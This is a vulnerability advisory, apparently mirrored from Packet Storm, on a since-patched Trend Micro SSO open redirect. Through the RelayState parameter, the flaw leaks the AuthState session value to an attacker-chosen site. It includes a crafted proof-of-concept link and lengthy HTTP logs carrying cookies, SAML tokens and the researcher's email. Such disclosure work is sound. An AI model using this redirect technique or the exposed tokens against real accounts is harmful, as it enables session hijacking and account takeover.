exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

TrendMicro SSO Redirect / Session Theft

TrendMicro SSO Redirect / Session Theft
Posted Mar 31, 2016
Authored by Hadji Samir, Vulnerability Laboratory | Site vulnerability-lab.com

TrendMicro's SSO suffers from a redirection and session theft vulnerability.

tags | exploit
SHA-256 | ac729a0d170ca203d8814d0ff62db8f0910eb3bad1e9b83558ea18573e4116d8

TrendMicro SSO Redirect / Session Theft

Change Mirror Download

Document Title:
===============
Trend Micro (SSO) - (Backend) SSO Redirect & Session Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=1694

Trand Micro ID: 1-1-1035080936


Release Date:
=============
2016-03-31


Vulnerability Laboratory ID (VL-ID):
====================================
1694


Common Vulnerability Scoring System:
====================================
6.5


Product & Service Introduction:
===============================
Trend Micro Inc. is a global security software company founded in Los
Angeles, California with global headquarters in Tokyo, Japan, and regional
headquarters in Asia, Europe and the Americas. The company develops
security software for servers, cloud computing environments, and small
business.
Its cloud and virtualization security products provide cloud security
for customers of VMware, Amazon AWS, Microsoft Azure and vCloud Air. Eva
Chen
serves as Trend Micro’s chief executive officer, a position she has held
since 2005 when she succeeded founding CEO Steve Chang. Chang serves as
chairman of Trend Micro.

(Copy of the Homepage: https://en.wikipedia.org/wiki/Trend_Micro )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a redirect
and session web vulnerability in the official trend micro sso online
service web-application.


Vulnerability Disclosure Timeline:
==================================
2016-01-28: Researcher Notification & Coordination (Benjamin Kunz Mejri
- Evolution Security GmbH)
2016-01-29: Vendor Notification (Trend Micro Security Team)
2016-02-02: Vendor Response/Feedback (Trend Micro Security Team)
2016-03-16: Vendor Fix/Patch (Trend Micro Developer Team)
2016-03-20: Security Bulletin (Trend Micro Security Team) [Acknowledgements]
2016-03-31: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Trend Micro
Product: Account System - (Web-Application) 2016 Q1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
A redirect issue with information leaking has been discovered in the
official Trendmirco online-service web-application.
The vulnerability allows an attacker to send a crafted link to the
victim. The execution (which requires a login) will disclose leaking
information to the attackers webserver.
In this case the AuthState value is beeing leaked.

The vulnerability is located in the SSOService.php. A remote attacker is
able to craft a link by modifing the RelayState parameter to his
webserver. After the link is clicked
by the victim the website requests him to login. After the login the
victim is beeing quitly redirected to the webserver. The previous
requests includes the new AuthState in
the GET request which includes the users session. The AuthState is
beeing exposed in the Referer afterwards. The attacker can use the
AuthState value to overtake the account session.

The vulnerability is located in the SSOService.php. A remote attacker is
able to craft a link by modifing the RelayState parameter to his
webserver. After the link is clicked by
the victim the website requests him to login. After the login the victim
is beeing quitly redirected to the webserver. The previous requests
includes the new AuthState in the GET
request which includes the users session. The AuthState is beeing
exposed in the Referer afterwards. The attacker can use the AuthState
value to overtake the account session.


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without
privileged web-application user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Send the victim the link
https://sso1.trendmicro.com/signin/tmsaml/idp/SSOService.php?spentityid=myaccount-sp&cookieTime=1454067237&RelayState=https%3A%2F%2Fyahoo.com%2Fmy_account%2F&language=EN-US
2. The victim will redirect to yahoo
3. The AuthState code will cached on the referer of the attackers
website ... like on yahoo
4. Successful reproduce of the vulnerability!


--- PoC Session Logs [POST & GET] ---
GET
https://sso1.trendmicro.com/signin/tmsaml/idp/SSOService.php?spentityid=myaccount-sp&cookieTime=1454067237&RelayState=https%3A%2F%2Fyahoo.com%2Fmy_account%2F&language=EN-US
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content
Size[-1] Mime Type[text/html]
Request Headers:
Host[sso1.trendmicro.com]
User-Agent[Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0)
Gecko/20100101 Firefox/44.0]

Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate, br]
Cookie[_ga=GA1.2.1194930175.1453994345;
utag_main=v_id:015288d105ce000fa589cc8a744109052003100f00838$_sn:2$_ss:0$_st:1454070083313$dc_visit:2$_pn:3%3Bexp-session$ses_id:1454067244107%3Bexp-session$dc_event:13%3Bexp-session$dc_region:eu-west-1%3Bexp-session;
_mkto_trk=id:945-CXD-062&token:_mch-trendmicro.com-1453994348264-99684;
s_fid=3ABA5DD4863BBED1-0CC8A9DCBDDFE9BC; my_username=; mmcore.tst=0.405;
mmid=1385887505%7CGAAAAAp7hzNf8gwAAA%3D%3D;
mmcore.pd=1827695683%7CHgAAAAoBQnuHM1/yDIhSt8QCANTOG7mgKNNIDwAAAPJgR8j4J9NIAAAAAP//////////AAZEaXJlY3QB8gwCAAAAAAAAAAAAACasAAAoVAAAJqwAAAEAL0kAAABcA9QT8gwA/////wHyDPIM//8GAAABAAAAAAH7swAAyxwBAAAAAAABRQ%3D%3D;
mmcore.srv=ldnvwcgus01;
__utma=44797537.1194930175.1453994345.1453996530.1454067543.2;
__utmz=44797537.1453996530.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
optimizelySegments=%7B%22172226454%22%3A%22direct%22%2C%22172226455%22%3A%22false%22%2C%22172356262%22%3A%22ff%22%2C%22172471167%22%3A%22none%22%2C%222323800464%22%3A%22true%22%7D;
optimizelyEndUserId=oeu1453995412771r0.8692327924248602;
optimizelyBuckets=%7B%7D;
bounceClientVisit626={"v":{"inc":0,"cv":0,"bouncex_group":"false"},"fvt":1453996532,"vid":1454067547100635,"ao":0,"as":0,"vpv":1,"d":"d","lp":"http%3A%2F%2Fstore.trendmicro.com%2Fstore%2Ftmamer%2Fen_US%2Fpd%2FproductID.246819400%3FSN%3DBAAA-0026-8173-9688-2227%2C556FB9F6CA384728BFB98685E717C657SAAID10012P999001dc78570595684efd9aa83c487c81675a%26VendorID%3D%26SID%3D%26deliveryEmail%3Dsamir%40evolution-sec.com%26deliveryFirstname%3Dsamir%26deliveryLastname%3Dtest%26x-VID%3D%26SessionID%3Ddc78570595684efd9aa83c487c81675a%26cm_lm%3Dccae38d831da6a0c965530a742e7d6af472905eb","r":"","cvt":1454067547,"gcr":73,"m":0,"sid":0,"lvt":1454067547,"ibxt":"MTQ1Mzk5NTQzMTY0ODM4NA%3D%3D"};
__qca=P0-2089330722-1453996387067;
mbox=session#1454067243496-470264#1454070070;
SimpleSAMLSessionID=28119447668568dc25d9f927a3de8b8d; cmTPSet=Y;
db_sampling_40=other; CMAVID=30051452809679160476046; s_cc=true;
ga_user_id=1194930175.1453994345;
s_sq=trndmcrjptrendmicrojpprd%3D%2526pid%253Dsso1.trendmicro.com%25252Fsignin%25252Fmodule.php%25252Fmyaccount%25252Floginuserpass.php%2526pidt%253D1%2526oid%253DSign%252520In%2526oidt%253D3%2526ot%253DSUBMIT;
SimpleSAMLAuthToken=_14b1a6b84f5a4395934a9852d7f54a891925085f91]
Connection[keep-alive]
Response Headers:
Date[Fri, 29 Jan 2016 12:20:22 GMT]
Server[Apache/2.2.15 (CentOS)]
Strict-Transport-Security[max-age=63072000; includeSubdomains;
preload]
X-Frame-Options[SAMEORIGIN]
x-content-type-options[nosniff]
Connection[close]
Transfer-Encoding[chunked]
Content-Type[text/html; charset=UTF-8]



POST
https://account.trendmicro.com/signin/module.php/tmsaml/sp/saml2-acs.php/myaccount-sp
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content
Size[368] Mime Type[text/html]
Request Headers:
Host[account.trendmicro.com]
User-Agent[Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0)
Gecko/20100101 Firefox/44.0]

Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate, br]

Referer[https://sso1.trendmicro.com/signin/tmsaml/idp/SSOService.php?spentityid=myaccount-sp&cookieTime=1454067237&RelayState=https%3A%2F%2Fyahoo.com%2Fmy_account%2F&language=EN-US]
Cookie[_ga=GA1.2.1194930175.1453994345;
utag_main=v_id:015288d105ce000fa589cc8a744109052003100f00838$_sn:2$_ss:0$_st:1454070083313$dc_visit:2$_pn:3%3Bexp-session$ses_id:1454067244107%3Bexp-session$dc_event:13%3Bexp-session$dc_region:eu-west-1%3Bexp-session;
_mkto_trk=id:945-CXD-062&token:_mch-trendmicro.com-1453994348264-99684;
s_fid=3ABA5DD4863BBED1-0CC8A9DCBDDFE9BC; mmcore.tst=0.405;
mmid=1385887505%7CGAAAAAp7hzNf8gwAAA%3D%3D;
mmcore.pd=1827695683%7CHgAAAAoBQnuHM1/yDIhSt8QCANTOG7mgKNNIDwAAAPJgR8j4J9NIAAAAAP//////////AAZEaXJlY3QB8gwCAAAAAAAAAAAAACasAAAoVAAAJqwAAAEAL0kAAABcA9QT8gwA/////wHyDPIM//8GAAABAAAAAAH7swAAyxwBAAAAAAABRQ%3D%3D;
mmcore.srv=ldnvwcgus01;
__utma=44797537.1194930175.1453994345.1453996530.1454067543.2;
__utmz=44797537.1453996530.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
optimizelySegments=%7B%22172226454%22%3A%22direct%22%2C%22172226455%22%3A%22false%22%2C%22172356262%22%3A%22ff%22%2C%22172471167%22%3A%22none%22%2C%222323800464%22%3A%22true%22%7D;
optimizelyEndUserId=oeu1453995412771r0.8692327924248602;
optimizelyBuckets=%7B%7D;
bounceClientVisit626={"v":{"inc":0,"cv":0,"bouncex_group":"false"},"fvt":1453996532,"vid":1454067547100635,"ao":0,"as":0,"vpv":1,"d":"d","lp":"http%3A%2F%2Fstore.trendmicro.com%2Fstore%2Ftmamer%2Fen_US%2Fpd%2FproductID.246819400%3FSN%3DBAAA-0026-8173-9688-2227%2C556FB9F6CA384728BFB98685E717C657SAAID10012P999001dc78570595684efd9aa83c487c81675a%26VendorID%3D%26SID%3D%26deliveryEmail%3Dsamir%40evolution-sec.com%26deliveryFirstname%3Dsamir%26deliveryLastname%3Dtest%26x-VID%3D%26SessionID%3Ddc78570595684efd9aa83c487c81675a%26cm_lm%3Dccae38d831da6a0c965530a742e7d6af472905eb","r":"","cvt":1454067547,"gcr":73,"m":0,"sid":0,"lvt":1454067547,"ibxt":"MTQ1Mzk5NTQzMTY0ODM4NA%3D%3D"};
__qca=P0-2089330722-1453996387067;
mbox=session#1454067243496-470264#1454070070; s_cc=true;
ga_user_id=1194930175.1453994345;
s_sq=trndmcrjptrendmicrojpprd%3D%2526pid%253Dsso1.trendmicro.com%25252Fsignin%25252Fmodule.php%25252Fmyaccount%25252Floginuserpass.php%2526pidt%253D1%2526oid%253DSign%252520In%2526oidt%253D3%2526ot%253DSUBMIT;
SimpleSAMLSessionID=01618d37b8c219c72821da79e9405c3f;
SimpleSAMLAuthToken=_a33b2c8d226a1c70d1cf6e4b00d4f6915ce83e9773]
Connection[keep-alive]
Post Data:
SAMLResponse[PHNhbWxwOlJlc3BvbnNlIHhtbG5zOnNhbWxwPSJ1cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6cHJvdG9jb2wiIHhtbG5zOnNhbWw9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDphc3NlcnRpb24iIElEPSJfZGZkMjU2NGNkNjI1NTYzOTBjNDI1ZGJiOTA4YWY1MDNiOGQ1ZmUwMmJiIiBWZXJzaW9uPSIyLjAiIElzc3VlSW5zdGFudD0iMjAxNi0wMS0yOVQxMjoyMDoyM1oiIERlc3RpbmF0aW9uPSJodHRwczovL2FjY291bnQudHJlbmRtaWNyby5jb20vc2lnbmluL21vZHVsZS5waHAvdG1zYW1sL3NwL3NhbWwyLWFjcy5waHAvbXlhY2NvdW50LXNwIj48c2FtbDpJc3N1ZXI%2BaHR0cHM6Ly9zc28xLnRyZW5kbWljcm8uY29tL3NpZ25pbi9zYW1sMi9pZHAvbWV0YWRhdGEucGhwPC9zYW1sOklzc3Vlcj48ZHM6U2lnbmF0dXJlIHhtbG5zOmRzPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwLzA5L3htbGRzaWcjIj4KICA8ZHM6U2lnbmVkSW5mbz48ZHM6Q2Fub25pY2FsaXphdGlvbk1ldGhvZCBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvMTAveG1sLWV4Yy1jMTRuIyIvPgogICAgPGRzOlNpZ25hdHVyZU1ldGhvZCBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyNyc2Etc2hhMSIvPgogIDxkczpSZWZlcmVuY2UgVVJJPSIjX2RmZDI1NjRjZDYyNTU2MzkwYzQyNWRiYjkwOGFmNTAzYjhkNWZlMDJiYiI%2BPGRzOlRyYW5zZm9ybXM%2BPGRzOlRyYW5zZm9ybSBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyNlbnZlbG9wZWQtc2lnbmF0dXJlIi8%2BPGRzOlRyYW5zZm9ybSBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvMTAveG1sLWV4Yy1jMTRuIyIvPjwvZHM6VHJhbnNmb3Jtcz48ZHM6RGlnZXN0TWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMC8wOS94bWxkc2lnI3NoYTEiLz48ZHM6RGlnZXN0VmFsdWU%2BSDNlcVhEaWVOWG5YcnBRaUZ4cmxYZ25tbVJnPTwvZHM6RGlnZXN0VmFsdWU%2BPC9kczpSZWZlcmVuY2U%2BPC9kczpTaWduZWRJbmZvPjxkczpTaWduYXR1cmVWYWx1ZT5tTGVPZkpDZFRkQzRPTXp4dVk2NnEvcE91UG5LYUxTS2tBY1Y4RFoxM25iNklSSEFTV3hVL3dlZE96OU9WaXN6Y2lTN0h6dlpSQ2djQXo3amgwdTlpazlmam4yNE5PR09ObjZySG9ra0xQaXY4N2FpUWMvSkN6emd1M1pmQzcrV3pXOXY4QW5DZjIxWmZ6RDArWDZyb3lvLzkrQkVXVmtJVmkzNklEWVdWOFJSeXVqTVFQUFQxZ3NXYTVXUzQ3aE5WUmdZcyt3YmlzbklGMG81TWovaWlUdjdobUZaQ2VDTWljMm03RENQM2lnQlR3R0hrZnpsUC9FdldGcXJldnV3clZkVS9VS3FDRjltcXNjeG5INWE5YkNxZmU2ekIzK2wzdHZkSDgwd0Z3Tkg0aldvSWRXY1hPOTZEbUQ2MEs0QUQ1YVpIcW45Uk9YR1JwaUNyanhRL0E9PTwvZHM6U2lnbmF0dXJlVmFsdWU%2BCjxkczpLZXlJbmZvPjxkczpYNTA5RGF0YT48ZHM6WDUwOUNlcnRpZmljYXRlPk1JSURGRENDQWZ5Z0F3SUJBZ0lKQUtoSmdOUDAvZzZhTUEwR0NTcUdTSWIzRFFFQkJRVUFNQkF4RGpBTUJnTlZCQU1UQlZSbGNuSmhNQjRYRFRFeE1ERXdNekF5TURFME4xb1hEVEl3TVRJek1UQXlNREUwTjFvd0VERU9NQXdHQTFVRUF4TUZWR1Z5Y21Fd2dnRWlNQTBHQ1NxR1NJYjNEUUVCQVFVQUE0SUJEd0F3Z2dFS0FvSUJBUURad2FJSmVwdHJJaVV4WjVXbDVMVVEvS0VpbEtPRmRZTWdTSjg0RkxDRTNXYlk2U1NWcURqWmYvcEM1dU4waFg4R0xPL3Z2UExVaGFHa1ZpdXhzSVRYM1VOUThLT1VlVW1lMHBVb1lFSWxFbjdJRmZuR29SQlV1eDJaTkVXVWRXelV3Z3RrR2dqRzhnTnROTGlnT3ZJN1ZPTndPZEM3bzZ0TUlHWm12azA1NFZLN2ZKMTkyTTJYNnNmay9YQnBicE5NWk5hQWRrR2dISlJqNk9UR2I5QkFPbzR3M2E3RTd0eVRveEd2czFpQWtQalg1SXE2NGltTFdnOW1OWjMvNkpZOHVhMkVpcXZhU0lsSHFZZzNJNjA2OEdCYlhZeDJtZmNLdlNFbTBwdDFoTm0zOExGdVVJNC9TQm1vVDFKeXRLcTIvQnNLc2o3RnZDWkRYck5Xb1NRcEFnTUJBQUdqY1RCdk1CMEdBMVVkRGdRV0JCUzF3OU1HSWRxMmQ2MmlVSkJFKzdLem5xNTFOVEJBQmdOVkhTTUVPVEEzZ0JTMXc5TUdJZHEyZDYyaVVKQkUrN0t6bnE1MU5hRVVwQkl3RURFT01Bd0dBMVVFQXhNRlZHVnljbUdDQ1FDb1NZRFQ5UDRPbWpBTUJnTlZIUk1FQlRBREFRSC9NQTBHQ1NxR1NJYjNEUUVCQlFVQUE0SUJBUUFQbDFtb0hUTGg1M3BkOGdhVU9uY1FJUFB6dFBvR1NiVURpclA2OFk5SVhGYmwwd3I3NnlFK0ROYys1cEExK0xZNDkvdjBPZ3BuTXY3UGlPTFhMQzNhdnpKVFhkSW9GS2Z2Mno3T24zaEp1d3EyUHpacHF4RXVzVEdHSkRHaW9BSnJSOU1PSzQ5Q1hVYmdaMTVvY0ZkUXVpays5ZDJXaHJqQW1ueEtLbVVJZWxOOEpWVjFTQWhwOUpjN2NiZTJJZVl0cFViSyt0QnVROFFvT01tTUtxTEh3UE5ad2RYT0o1NWFsNHBLT3VzVTJSOXpyZnREWXlFUU1KOHVIZkdCSzZtYnoxWEFDOG9QUW5FQ2VkS0I4a3I0eG9md09aWjRCSmNZZDhNQ3ptNUNXRmtBRHljQTRrNlVvd1pnODY0dWFEbk1lZ2VxN1Vwd3NlZks3RzFJVzdpSzwvZHM6WDUwOUNlcnRpZmljYXRlPjwvZHM6WDUwOURhdGE%2BPC9kczpLZXlJbmZvPjwvZHM6U2lnbmF0dXJlPjxzYW1scDpTdGF0dXM%2BPHNhbWxwOlN0YXR1c0NvZGUgVmFsdWU9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDpzdGF0dXM6U3VjY2VzcyIvPjwvc2FtbHA6U3RhdHVzPjxzYW1sOkFzc2VydGlvbiB4bWxuczp4c2k9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hLWluc3RhbmNlIiB4bWxuczp4cz0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEiIElEPSJfOGE1MTYzMzc3NWIxNjJmOWRlOGZhMmEwMDQwY2I1ZDdmZTEzYjdiMzdmIiBWZXJzaW9uPSIyLjAiIElzc3VlSW5zdGFudD0iMjAxNi0wMS0yOVQxMjoyMDoyM1oiPjxzYW1sOklzc3Vlcj5odHRwczovL3NzbzEudHJlbmRtaWNyby5jb20vc2lnbmluL3NhbWwyL2lkcC9tZXRhZGF0YS5waHA8L3NhbWw6SXNzdWVyPjxkczpTaWduYXR1cmUgeG1sbnM6ZHM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyMiPgogIDxkczpTaWduZWRJbmZvPjxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8%2BCiAgICA8ZHM6U2lnbmF0dXJlTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMC8wOS94bWxkc2lnI3JzYS1zaGExIi8%2BCiAgPGRzOlJlZmVyZW5jZSBVUkk9IiNfOGE1MTYzMzc3NWIxNjJmOWRlOGZhMmEwMDQwY2I1ZDdmZTEzYjdiMzdmIj48ZHM6VHJhbnNmb3Jtcz48ZHM6VHJhbnNmb3JtIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMC8wOS94bWxkc2lnI2VudmVsb3BlZC1zaWduYXR1cmUiLz48ZHM6VHJhbnNmb3JtIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8%2BPC9kczpUcmFuc2Zvcm1zPjxkczpEaWdlc3RNZXRob2QgQWxnb3JpdGhtPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwLzA5L3htbGRzaWcjc2hhMSIvPjxkczpEaWdlc3RWYWx1ZT5sbk1xNmtkUHdCdTJ3WE04cjRZeEdqNGRMUFk9PC9kczpEaWdlc3RWYWx1ZT48L2RzOlJlZmVyZW5jZT48L2RzOlNpZ25lZEluZm8%2BPGRzOlNpZ25hdHVyZVZhbHVlPmpZbkxvblhIdEdCOGlxODRQZFpXOWpFdzJndWRxM0tEQ3FyMGtEQjl4TW4xUXE3TG1FQ3B6cUFRei93ZFFVSUx6cHlRNFgvQWREME5nTFJudk1nK0dEWmNjRWZvUWhTVC9VSithdmJHVFAvMTFrM2Mvczl5c0ZwcjlKSG5LOU9uMkUxUVlBeXdEMnhIWHE4NnZjNEU1YjVOYzM4MFozeUpkYi8yNmwxQllrWm9wV3ltMGY4L0EzUmJENlJNdkFBK1VPajUwK0FTcnMwa0N3SEdJSllCS2hwM3BwQXhPMWg3bkNqVGUremx2elpOV3RFTDNtOFpRQjhSckhQVU9CR2FZdjZTQTBHNDBRNkFyeE4yR3BHVjJENzN5MWprQ2ZSK0Q3d0RqUTMrRlBPekozNGo0L2haUi9seWJqeFRqTkFNUVpDbWk5UFM2dzNXcTJDL3EydHo3Zz09PC9kczpTaWduYXR1cmVWYWx1ZT4KPGRzOktleUluZm8%2BPGRzOlg1MDlEYXRhPjxkczpYNTA5Q2VydGlmaWNhdGU%2BTUlJREZEQ0NBZnlnQXdJQkFnSUpBS2hKZ05QMC9nNmFNQTBHQ1NxR1NJYjNEUUVCQlFVQU1CQXhEakFNQmdOVkJBTVRCVlJsY25KaE1CNFhEVEV4TURFd016QXlNREUwTjFvWERUSXdNVEl6TVRBeU1ERTBOMW93RURFT01Bd0dBMVVFQXhNRlZHVnljbUV3Z2dFaU1BMEdDU3FHU0liM0RRRUJBUVVBQTRJQkR3QXdnZ0VLQW9JQkFRRFp3YUlKZXB0cklpVXhaNVdsNUxVUS9LRWlsS09GZFlNZ1NKODRGTENFM1diWTZTU1ZxRGpaZi9wQzV1TjBoWDhHTE8vdnZQTFVoYUdrVml1eHNJVFgzVU5ROEtPVWVVbWUwcFVvWUVJbEVuN0lGZm5Hb1JCVXV4MlpORVdVZFd6VXdndGtHZ2pHOGdOdE5MaWdPdkk3Vk9Od09kQzdvNnRNSUdabXZrMDU0Vks3ZkoxOTJNMlg2c2ZrL1hCcGJwTk1aTmFBZGtHZ0hKUmo2T1RHYjlCQU9vNHczYTdFN3R5VG94R3ZzMWlBa1BqWDVJcTY0aW1MV2c5bU5aMy82Slk4dWEyRWlxdmFTSWxIcVlnM0k2MDY4R0JiWFl4Mm1mY0t2U0VtMHB0MWhObTM4TEZ1VUk0L1NCbW9UMUp5dEtxMi9Cc0tzajdGdkNaRFhyTldvU1FwQWdNQkFBR2pjVEJ2TUIwR0ExVWREZ1FXQkJTMXc5TUdJZHEyZDYyaVVKQkUrN0t6bnE1MU5UQkFCZ05WSFNNRU9UQTNnQlMxdzlNR0lkcTJkNjJpVUpCRSs3S3pucTUxTmFFVXBCSXdFREVPTUF3R0ExVUVBeE1GVkdWeWNtR0NDUUNvU1lEVDlQNE9takFNQmdOVkhSTUVCVEFEQVFIL01BMEdDU3FHU0liM0RRRUJCUVVBQTRJQkFRQVBsMW1vSFRMaDUzcGQ4Z2FVT25jUUlQUHp0UG9HU2JVRGlyUDY4WTlJWEZibDB3cjc2eUUrRE5jKzVwQTErTFk0OS92ME9ncG5NdjdQaU9MWExDM2F2ekpUWGRJb0ZLZnYyejdPbjNoSnV3cTJQelpwcXhFdXNUR0dKREdpb0FKclI5TU9LNDlDWFViZ1oxNW9jRmRRdWlrKzlkMldocmpBbW54S0ttVUllbE44SlZWMVNBaHA5SmM3Y2JlMkllWXRwVWJLK3RCdVE4UW9PTW1NS3FMSHdQTlp3ZFhPSjU1YWw0cEtPdXNVMlI5enJmdERZeUVRTUo4dUhmR0JLNm1iejFYQUM4b1BRbkVDZWRLQjhrcjR4b2Z3T1paNEJKY1lkOE1Dem01Q1dGa0FEeWNBNGs2VW93Wmc4NjR1YURuTWVnZXE3VXB3c2VmSzdHMUlXN2lLPC9kczpYNTA5Q2VydGlmaWNhdGU%2BPC9kczpYNTA5RGF0YT48L2RzOktleUluZm8%2BPC9kczpTaWduYXR1cmU%2BPHNhbWw6U3ViamVjdD48c2FtbDpOYW1lSUQgU1BOYW1lUXVhbGlmaWVyPSJteWFjY291bnQtc3AiIEZvcm1hdD0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOm5hbWVpZC1mb3JtYXQ6dHJhbnNpZW50Ij5fNWVkYmFkMzJmYzYyNWM4Y2VjZWM0MjRmZGQzYmE5ZGY0NmM5ZWY4OWVjPC9zYW1sOk5hbWVJRD48c2FtbDpTdWJqZWN0Q29uZmlybWF0aW9uIE1ldGhvZD0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOmNtOmJlYXJlciI%2BPHNhbWw6U3ViamVjdENvbmZpcm1hdGlvbkRhdGEgTm90T25PckFmdGVyPSIyMDE2LTAxLTI5VDEyOjI1OjIzWiIgUmVjaXBpZW50PSJodHRwczovL2FjY291bnQudHJlbmRtaWNyby5jb20vc2lnbmluL21vZHVsZS5waHAvdG1zYW1sL3NwL3NhbWwyLWFjcy5waHAvbXlhY2NvdW50LXNwIi8%2BPC9zYW1sOlN1YmplY3RDb25maXJtYXRpb24%2BPC9zYW1sOlN1YmplY3Q%2BPHNhbWw6Q29uZGl0aW9ucyBOb3RCZWZvcmU9IjIwMTYtMDEtMjlUMTI6MTk6NTNaIiBOb3RPbk9yQWZ0ZXI9IjIwMTYtMDEtMjlUMTI6MjU6MjNaIj48c2FtbDpBdWRpZW5jZVJlc3RyaWN0aW9uPjxzYW1sOkF1ZGllbmNlPm15YWNjb3VudC1zcDwvc2FtbDpBdWRpZW5jZT48L3NhbWw6QXVkaWVuY2VSZXN0cmljdGlvbj48L3NhbWw6Q29uZGl0aW9ucz48c2FtbDpBdXRoblN0YXRlbWVudCBBdXRobkluc3RhbnQ9IjIwMTYtMDEtMjlUMTE6NTE6MzlaIiBTZXNzaW9uTm90T25PckFmdGVyPSIyMDE2LTAxLTI5VDIwOjIwOjIzWiIgU2Vzc2lvbkluZGV4PSJfNzRhNjY1Y2I5NmE2ZDY0ZTQyZmE1YjhkNTAyYmRkYTEwNzZkMTQyMDhmIj48c2FtbDpBdXRobkNvbnRleHQ%2BPHNhbWw6QXV0aG5Db250ZXh0Q2xhc3NSZWY%2BdXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOmFjOmNsYXNzZXM6UGFzc3dvcmQ8L3NhbWw6QXV0aG5Db250ZXh0Q2xhc3NSZWY%2BPC9zYW1sOkF1dGhuQ29udGV4dD48L3NhbWw6QXV0aG5TdGF0ZW1lbnQ%2BPHNhbWw6QXR0cmlidXRlU3RhdGVtZW50PjxzYW1sOkF0dHJpYnV0ZSBOYW1lPSJVc2VyQWNjb3VudElEIiBOYW1lRm9ybWF0PSJ1cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6YXR0cm5hbWUtZm9ybWF0OmJhc2ljIj48c2FtbDpBdHRyaWJ1dGVWYWx1ZSB4c2k6dHlwZT0ieHM6c3RyaW5nIj5zYW1pckBldm9sdXRpb24tc2VjLmNvbTwvc2FtbDpBdHRyaWJ1dGVWYWx1ZT48L3NhbWw6QXR0cmlidXRlPjxzYW1sOkF0dHJpYnV0ZSBOYW1lPSJVc2VyQWNjb3VudE5hbWUiIE5hbWVGb3JtYXQ9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDphdHRybmFtZS1mb3JtYXQ6YmFzaWMiPjxzYW1sOkF0dHJpYnV0ZVZhbHVlIHhzaTp0eXBlPSJ4czpzdHJpbmciPnNhbWlyQGV2b2x1dGlvbi1zZWMuY29tPC9zYW1sOkF0dHJpYnV0ZVZhbHVlPjwvc2FtbDpBdHRyaWJ1dGU%2BPHNhbWw6QXR0cmlidXRlIE5hbWU9IkNvbnN1bWVyQWNjb3VudElEIiBOYW1lRm9ybWF0PSJ1cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6YXR0cm5hbWUtZm9ybWF0OmJhc2ljIj48c2FtbDpBdHRyaWJ1dGVWYWx1ZSB4c2k6dHlwZT0ieHM6c3RyaW5nIj41MDE5NzM3Mzwvc2FtbDpBdHRyaWJ1dGVWYWx1ZT48L3NhbWw6QXR0cmlidXRlPjwvc2FtbDpBdHRyaWJ1dGVTdGF0ZW1lbnQ%2BPC9zYW1sOkFzc2VydGlvbj48L3NhbWxwOlJlc3BvbnNlPg%3D%3D]
RelayState[https%3A%2F%2Fyahoo.com%2Fmy_account%2F]
Response Headers:
Date[Fri, 29 Jan 2016 12:20:24 GMT]
Server[Apache]

Set-Cookie[SimpleSAMLAuthToken=_d3a3368aeec333b95a3983ed8eb76342a58992e21d;
path=/; httponly]
Location[https://yahoo.com/my_account/]
Pragma[no-cache]
Cache-Control[no-cache, must-revalidate]
Vary[Accept-Encoding]
Content-Encoding[gzip]
X-Frame-Options[SAMEORIGIN]
Content-Length[368]
Connection[close]
Content-Type[text/html; charset=UTF-8]



GET https://yahoo.com/my_account/ Load Flags[LOAD_DOCUMENT_URI
LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Content Size[382] Mime
Type[text/html]
Request Headers:
Host[yahoo.com]
User-Agent[Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0)
